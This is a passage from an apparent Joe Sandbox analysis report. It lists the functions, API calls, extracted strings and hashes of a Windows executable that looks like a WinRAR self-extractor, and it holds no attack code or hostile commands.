Opcode Fuzzy Hash: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
Instruction Fuzzy Hash: 231121322447507BEA21BBB49CCEFAF765CFB50751F098120FA51EA092DA64CE0542AA

Uniqueness

Uniqueness Score: -1.00%

Function 008A96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008A9705

Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4

_free.LIBCMT ref: 008A9711
_free.LIBCMT ref: 008A971C
_free.LIBCMT ref: 008A9727
_free.LIBCMT ref: 008A9732
_free.LIBCMT ref: 008A973D
_free.LIBCMT ref: 008A9748
_free.LIBCMT ref: 008A9753
_free.LIBCMT ref: 008A975E
_free.LIBCMT ref: 008A976C

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
Instruction ID: 960c622ca857e33f3dfd0873db6cdf748cd03ce8d45f4f7c7da7b71f57d7f7c3
Opcode Fuzzy Hash: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
Instruction Fuzzy Hash: 2811D4B6500009EFEB01EFA8C842CD93BB5FF15390B4150A0FB088FA62DE32DA509B95

Uniqueness

Uniqueness Score: -1.00%

Function 008A2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 008A2F50
___TypeMatch.LIBVCRUNTIME ref: 008A305E
_UnwindNestedFrames.LIBCMT ref: 008A31B0
CallUnexpected.LIBVCRUNTIME ref: 008A31CB
_abort.LIBCMT ref: 008A31D0

Strings

csm, xrefs: 008A2EDB
csm, xrefs: 008A2E6E
csm, xrefs: 008A2F87

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
Instruction ID: e46f311bc5ad5260f530c04c4e6a479d64907c307629b1f98872fbb66f5a8fc3
Opcode Fuzzy Hash: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
Instruction Fuzzy Hash: 64B18F71800219EFEF25DFA8C8819AEB7B5FF16310F14415AF811ABA12D735EA51CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00886FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00886FAA
_wcslen.LIBCMT ref: 00887013
_wcslen.LIBCMT ref: 00887084

Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00

Strings

\??\, xrefs: 0088702B
SeRestorePrivilege, xrefs: 00886FC2
UNC\, xrefs: 00887051
SeCreateSymbolicLinkPrivilege, xrefs: 00886FCC

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
Instruction ID: 52eaa80bac8aed52205572b7af367f78171a8dca0c12fcf00bc2c0867a0f9175
Opcode Fuzzy Hash: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
Instruction Fuzzy Hash: 3741E5B1D08744AAEB20F7789C86FEE777CFF15304F140455FA55E6282D674AA888722

Uniqueness

Uniqueness Score: -1.00%

Function 00899711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00899736
_wcslen.LIBCMT ref: 008997D6
GlobalAlloc.KERNEL32(00000040,?), ref: 008997E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00899806

Strings

utf-8"></head>, xrefs: 0089976B
</html>, xrefs: 008997B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00899760
<html>, xrefs: 00899755, 0089978E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
Instruction ID: fafa6d481c06eac0908c0dfabd5988e175348f2b15620a5d9d4e283d68ad442c
Opcode Fuzzy Hash: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
Instruction Fuzzy Hash: BB3115325087017AEB25BF6C9C46FAB779CFF52320F18011DF551E66D2EB649A0883A7

Uniqueness

Uniqueness Score: -1.00%

Function 0089B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

EndDialog.USER32(?,00000001), ref: 0089B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0089B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0089B650
SetWindowTextW.USER32(?,?), ref: 0089B661
GetDlgItem.USER32(?,00000065), ref: 0089B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0089B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0089B694

Strings

LICENSEDLG, xrefs: 0089B5D4

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
Instruction ID: 2eed8b4fe44ef66d0edc37a24fb06d5782a91cef9c1b2426bd6b6a6b2e4a6cc1
Opcode Fuzzy Hash: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
Instruction Fuzzy Hash: FD210532204214BBDA126F6AFD8DF3B3B6CFB56B41F050019F601EA4A0CB62AE019631

Uniqueness

Uniqueness Score: -1.00%

Function 0089FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE14
SysAllocString.OLEAUT32(00000000), ref: 0089FE1F
_com_issue_error.COMSUPP ref: 0089FE48
_com_issue_error.COMSUPP ref: 0089FE52
GetLastError.KERNEL32(80070057,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE57
_com_issue_error.COMSUPP ref: 0089FE6A
GetLastError.KERNEL32(00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE80
_com_issue_error.COMSUPP ref: 0089FE93

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: ef58c9ee092462e2f1c5d0f6dbdffe91134a0658c917890ceab30603a398309b
Instruction ID: a50809acd68fa37ce2773463eac84aac5281f1d98056b2ce2c3e4596eca4b16a
Opcode Fuzzy Hash: ef58c9ee092462e2f1c5d0f6dbdffe91134a0658c917890ceab30603a398309b
Instruction Fuzzy Hash: 9041DA71A00219AFDF14AF68CC45BAFBBA8FF44714F184239FA15EB652D7349900C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0088AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0088AF29

Strings

ROOT\CIMV2, xrefs: 0088AF5C
SELECT * FROM Win32_OperatingSystem, xrefs: 0088AFCA
WQL, xrefs: 0088AFDC
Windows 10, xrefs: 0088B0C2
Name, xrefs: 0088B0B0

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 565e717a35932ca62266eba5233da0cb725939d6cf44288708cdda7dae042f49
Instruction ID: a35a24b98e82bd520d3738b1b1797bae2f2ba0b6df0f881275cec851644323aa
Opcode Fuzzy Hash: 565e717a35932ca62266eba5233da0cb725939d6cf44288708cdda7dae042f49
Instruction Fuzzy Hash: 89715C70A00619EFEB14EFA4CC959AFBBB9FF88314B14015DE516E72A0CB30AD01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00889382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00889387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008893AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008893C9

Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2

Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1

_swprintf.LIBCMT ref: 00889465

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

MoveFileW.KERNEL32(?,?), ref: 008894D4
MoveFileW.KERNEL32(?,?), ref: 00889514

Strings

rtmp%d, xrefs: 0088944E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 37c4181bc81cb4f4a78de8dcc9cf18051ba1df3e1f4c6f7ba29d4afc5fbc3ab1
Instruction ID: 70eab6f05cf3d342c0979eca4236a5ab8d41c98e733984f461bbe487ed3e571c
Opcode Fuzzy Hash: 37c4181bc81cb4f4a78de8dcc9cf18051ba1df3e1f4c6f7ba29d4afc5fbc3ab1
Instruction Fuzzy Hash: 8C4184B1940259A6DF21FBA4CC45EEE737CFF45340F0848A5F689E3051EB389B898B61

Uniqueness

Uniqueness Score: -1.00%

Function 00891218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0089122E

Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00891251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00891263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00891274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00891284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00891294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008912CF
__aullrem.LIBCMT ref: 00891379

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: cbe357b1edfaa8aee5aca922ee45b7b60957a6ee6f7fd13ca1303fccbdb9d9d9
Instruction ID: 7e186afca379b63f09818838ee54390764b3569d34f7b70828311ec6e62ef739
Opcode Fuzzy Hash: cbe357b1edfaa8aee5aca922ee45b7b60957a6ee6f7fd13ca1303fccbdb9d9d9
Instruction Fuzzy Hash: 29410CB15083059FCB10EF65C88496BBBF9FF88314F04892EF596C2210E738E549DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00882210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00882536

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0

Strings

;%u, xrefs: 00882523
xc%u, xrefs: 0088275A
x%u, xrefs: 008826FD

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: ed1812c69c6cc61d1ad9c5e0f883498c511386fbc355d7e53920cc61b7dc3308
Instruction ID: bf5e8f9581cf40c2d806bd5c41ffbd0b24ad1a90e4a1a7e66498a50a64837bf0
Opcode Fuzzy Hash: ed1812c69c6cc61d1ad9c5e0f883498c511386fbc355d7e53920cc61b7dc3308
Instruction Fuzzy Hash: E9F1F3706083419BDF25FB288495BEA779AFF90300F08057DED8AEB287DB6499458763

Uniqueness

Uniqueness Score: -1.00%

Function 00899CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00899D0A

Strings

</p>, xrefs: 00899DE8
<br>, xrefs: 00899DFE
>, xrefs: 00899D4B
<style>, xrefs: 00899E30
</style>, xrefs: 00899E52

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 2b801be6e34c2c577b3b32c844c02b8b37dd79956567d40c5b84a5f05473160f
Instruction ID: 331269b44e0d3e2712874b77c777e9128441b9e08ac631568a60288fbd685cbd
Opcode Fuzzy Hash: 2b801be6e34c2c577b3b32c844c02b8b37dd79956567d40c5b84a5f05473160f
Instruction Fuzzy Hash: 5C51F46664532395DF30BA2D9C5277A73A0FFA1790F6D042EF9C1CB6C1FBA58C818261

Uniqueness

Uniqueness Score: -1.00%

Function 008AF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008AFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 008AF6CF
__fassign.LIBCMT ref: 008AF74A
__fassign.LIBCMT ref: 008AF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008AF78B
WriteFile.KERNEL32(?,00000000,00000000,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7AA
WriteFile.KERNEL32(?,00000000,00000001,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7E3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: fed920a6f9262821adc552716fe53048227b9da2e15cde241fd68714827833cc
Instruction ID: 93cc5e768ef2010ba8d40427089afb63d4fa88ce5da8103509d163008544d1b6
Opcode Fuzzy Hash: fed920a6f9262821adc552716fe53048227b9da2e15cde241fd68714827833cc
Instruction Fuzzy Hash: DB5182B19002499FDB10CFA8DC85AEEBBF8FF09310F14416AE655E7652D774AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 008A2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008A2937
___except_validate_context_record.LIBVCRUNTIME ref: 008A293F
_ValidateLocalCookies.LIBCMT ref: 008A29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 008A29F3
_ValidateLocalCookies.LIBCMT ref: 008A2A48

Strings

csm, xrefs: 008A29DD

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9f3813fcd6fb17611c1dbe08d7db14c15d416035700ef8bdc8708b4dacd7c980
Instruction ID: 862c76aa1849667d9bbc0e2d18baf8106efd384945248329448cf5cfb4153269
Opcode Fuzzy Hash: 9f3813fcd6fb17611c1dbe08d7db14c15d416035700ef8bdc8708b4dacd7c980
Instruction Fuzzy Hash: D2419330A00218AFDF20DF6CC885A9EBFA5FF46324F148155E815EB792D775AA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00899ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00899EEE
GetWindowRect.USER32(?,00000000), ref: 00899F44
ShowWindow.USER32(?,00000005,00000000), ref: 00899FDB
SetWindowTextW.USER32(?,00000000), ref: 00899FE3
ShowWindow.USER32(00000000,00000005), ref: 00899FF9

Strings

RarHtmlClassName, xrefs: 00899FA5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 99eb540a46753b57ffd163d050836c9eb367e9c8c3b5f9b5917928777c353c2b
Instruction ID: ce77b316c691ef52f8b40aaec91df8e0f4336c797e47d55e244cd0ff1944aa32
Opcode Fuzzy Hash: 99eb540a46753b57ffd163d050836c9eb367e9c8c3b5f9b5917928777c353c2b
Instruction Fuzzy Hash: DF419E32004214EFDB216F68DC8DB6BBBA8FB48715F08455DF84ADA156DB34DE04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00899955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0089995E
_wcslen.LIBCMT ref: 00899993

Strings

<br>, xrefs: 008999DF
 , xrefs: 00899A21
, xrefs: 008999B0
